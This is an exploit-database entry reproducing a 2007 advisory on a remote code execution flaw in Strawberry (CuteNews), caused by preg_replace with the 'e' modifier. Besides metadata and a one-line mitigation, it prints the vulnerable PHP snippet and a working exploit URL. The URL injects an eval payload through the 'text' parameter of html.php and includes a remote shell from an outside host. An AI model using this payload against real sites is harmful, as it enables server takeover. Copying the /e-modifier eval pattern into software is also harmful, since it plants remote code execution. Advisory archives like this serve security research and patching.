header-logo
Suggest Exploit
vendor:
CuteNews
by:
Eugene Minaev
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: CuteNews
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

Strawberry (CuteNews) Remote Code Execution

Preg_replace with 'e' modifier allows code execution. An attacker can exploit this vulnerability by sending a malicious payload to the vulnerable parameter 'text' in the 'html.php' file.

Mitigation:

Disable the 'e' modifier in the preg_replace function.
Source

Exploit-DB raw data:

----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]

							Strawberry (CuteNews) Remote Code Execution
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		Preg_replace with 'e' modifier allows code execution
		<?php

		$source = htmlspecialchars($text);

		$source = preg_replace(
		'/&lt;!--(.*?)--&gt;/es',
		'"<span style=\"color: ".$options["color"]["comment"].";\">&lt;!--".
		str_replace("&lt;","&lt;<!-- -->",
		str_replace("=","=<!-- -->",
		"$1")).
		"--&gt;</span>"',
		$source);  

		?>
		
		strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]

Navigation

Suggest Exploit

Services By CQR